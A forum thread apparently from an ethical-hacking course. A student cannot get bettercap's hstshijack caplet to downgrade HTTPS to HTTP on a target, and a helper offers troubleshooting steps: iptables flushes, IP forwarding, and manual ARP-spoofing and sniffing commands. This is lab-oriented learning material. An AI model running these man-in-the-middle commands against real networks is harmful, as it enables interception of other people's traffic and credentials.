I cannt seem to turn https into http

I’m on the gaining access to https part of the course and I fallowed all the steps but my target is still in http
plz help.

here are my commands

root@kali:~# bettercap -iface eth0 -caplet /root/1spoof.cap
bettercap v2.23 (built for linux amd64 with go1.11.6) [type ‘help’ for a list of commands]

[10:50:50] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
[10:50:50] [sys.log] [inf] net.probe Interface is in monitor mode, skipping net.probe
[10:50:50] [sys.log] [inf] arp.spoof enabling forwarding
[10:50:50] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
[10:50:50] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
eth0 » help

       help MODULE : List available commands or show module specific help if no module name is provided.
            active : Show information about active modules.
              quit : Close the session and exit.
     sleep SECONDS : Sleep for the given amount of seconds.
          get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
    set NAME VALUE : Set the VALUE of variable NAME.

read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.


  any.proxy > not running
   api.rest > not running
  arp.spoof > running
  ble.recon > not running
    caplets > not running
dhcp6.spoof > not running
  dns.spoof > not running

events.stream > running
gps > not running
hid > not running
http.proxy > not running
http.server > not running
https.proxy > not running
https.server > not running
mac.changer > not running
mysql.server > not running
net.probe > running
net.recon > running
net.sniff > running
packet.proxy > not running
syn.scan > not running
tcp.proxy > not running
ticker > not running
ui > not running
update > not running
wifi > not running
wol > not running

eth0 » caplets.show

│ Name │ Path │ Size │
│ 1spoof │ /root/1spoof.cap │ 124 B │
│ ap │ /usr/share/bettercap/caplets/ap.cap │ 307 B │
│ crypto-miner/crypto-miner │ /usr/share/bettercap/caplets/crypto-miner/crypto-miner.cap │ 666 B │
│ download-autopwn/download-autopwn │ /usr/share/bettercap/caplets/download-autopwn/download-autopwn.cap │ 2.6 kB │
│ fb-phish/fb-phish │ /usr/share/bettercap/caplets/fb-phish/fb-phish.cap │ 140 B │
│ gitspoof/gitspoof │ /usr/share/bettercap/caplets/gitspoof/gitspoof.cap │ 216 B │
│ gps │ /usr/share/bettercap/caplets/gps.cap │ 109 B │
│ hstshijack/hstshijack │ /root/hstshijack/hstshijack.cap │ 823 B │
│ hstshijack/hstshijack │ /root/hstshijack/hstshijack.cap │ 823 B │
│ http-req-dump/http-req-dump │ /usr/share/bettercap/caplets/http-req-dump/http-req-dump.cap │ 591 B │
│ http-ui │ /usr/share/bettercap/caplets/http-ui.cap │ 376 B │
│ https-ui │ /usr/share/bettercap/caplets/https-ui.cap │ 655 B │
│ jsinject/jsinject │ /usr/share/bettercap/caplets/jsinject/jsinject.cap │ 210 B │
│ local-sniffer │ /usr/share/bettercap/caplets/local-sniffer.cap │ 244 B │
│ login-manager-abuse/login-man-abuse │ /usr/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B │
│ mana │ /usr/share/bettercap/caplets/mana.cap │ 61 B │
│ massdeauth │ /usr/share/bettercap/caplets/massdeauth.cap │ 302 B │
│ mitm6 │ /usr/share/bettercap/caplets/mitm6.cap │ 551 B │
│ netmon │ /usr/share/bettercap/caplets/netmon.cap │ 42 B │
│ pita │ /usr/share/bettercap/caplets/pita.cap │ 900 B │
│ proxy-script-test/proxy-script-test │ /usr/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B │
│ pwnagotchi-auto │ /usr/share/bettercap/caplets/pwnagotchi-auto.cap │ 302 B │
│ pwnagotchi-manual │ /usr/share/bettercap/caplets/pwnagotchi-manual.cap │ 412 B │
│ rogue-mysql-server │ /usr/share/bettercap/caplets/rogue-mysql-server.cap │ 501 B │
│ rtfm/rtfm │ /usr/share/bettercap/caplets/rtfm/rtfm.cap │ 210 B │
│ simple-passwords-sniffer │ /usr/share/bettercap/caplets/simple-passwords-sniffer.cap │ 131 B │
│ tcp-req-dump/tcp-req-dump │ /usr/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap │ 413 B │
│ web-override/web-override │ /usr/share/bettercap/caplets/web-override/web-override.cap │ 254 B │
│ wpa_theHandshake-01 │ /root/wpa_theHandshake-01.cap │ 7.0 MB │
eth0 » hstshijack/hstshijack
[10:55:06] [sys.log] [inf] http.proxy started on (sslstrip disabled)
eth0 » [10:55:06] [sys.log] [inf] dns.spoof *.apple.corn ->
eth0 » [10:55:06] [sys.log] [inf] dns.spoof twitter.corn ->
eth0 » [10:55:06] [sys.log] [inf] dns.spoof *.twitter.corn ->
eth0 » [10:55:06] [sys.log] [inf] dns.spoof facebook.corn ->
eth0 » [10:55:06] [sys.log] [inf] dns.spoof *.facebook.corn ->
eth0 » [10:55:06] [sys.log] [inf] dns.spoof apple.corn ->
eth0 » [10:55:06] [sys.log] [inf] dns.spoof linkedin.com ->
eth0 » [10:55:06] [sys.log] [inf] dns.spoof ebay.corn ->
eth0 » [10:55:06] [sys.log] [inf] dns.spoof *.ebay.corn ->

If you figure it out could you explain it to me very thurowly. Thank you :slight_smile:

Hey, @Edwin can you help here? I have never used bettercap so I am not able to answer this.

Please try the following suggestions, they might help you in fixing the issue:

  • Try to remove ALL browsing data (cache, history…etc) before doing the attack.

  • Run the following commands to flush all IP tables rules before running bettercap:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

  • Enable IP forwarding again (just to double-check):

echo 1 > /proc/sys/net/ipv4/ip_forward

  • Try the attack against a different browser

  • Try also to execute the commands inside bettercap manually instead of using the spoof.cap caplet file in the following order:

net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets
set net.sniff.local true
arp.spoof on
net.sniff on


  • Try also to access Facebook, Twitter or similar sites that use HSTS from the different links you get in the search engine results when you access them from google.ie, google.gm, google.fr…etc (not google.com).

  • Try to reboot Kali and the target vm then redo the whole attack again to see if the page loads correctly after the downgrade.

And please read this:


Thank you very much this was quite helpful. :slight_smile:

Oh dear it seems that none of them work. Is it mandatory to get the new kali Linux update for my attack to be successful. Thank you for you’re time.

does it work with this website?

And I wouldn’t worry too much about bettercap.
You are really not the only student who has problems with this topic.
I think it has to do with this course being created a while ago. The security of the internet browsers / websites is also getting better. I think it will be time for Zaid to update his course.

If its no trouble do you know when it will be updated or how I can find out? I also ran into a very strange problem. When I got on virtual box today it had a little red sing with the words aborted next to them. Would you happen to know why it does that? Thank you:)

You can check Bettercap tool to see if it gets updated or not and also their issues page on GitHub: https://github.com/bettercap/bettercap/issues. I don’t know a timeline for when will Zaid update his course…

About the Aborted issue, it may happen due to various reasons. Ideally, you should delete everything from the virtual box folder and then import everything again.

Thank you! I’ll do that :slight_smile:

If you have never used bettercap then what do you use to downgrade https to http so I can try that. Thank you :slight_smile:

I am working in some other domain of security so I don’t do this

hey edwin, im new to this cybersecurity field and iam seeing youre very familiar with the topic. i just want to know if you can help me out with some stuff thank you

@5.0luis When it comes to the question of this topic, you can ask the question here. If it is a different question you can just create a new topic. I can always try to answer your question, but if it really helps is the next question. :slight_smile:

And by the way, bypassing https can really be a time consuming and very frustrating job.
And if you ask me, it is not worth putting so much time into this.

Ok I will skip this specific part of the course. Thank you for all the help you gave me.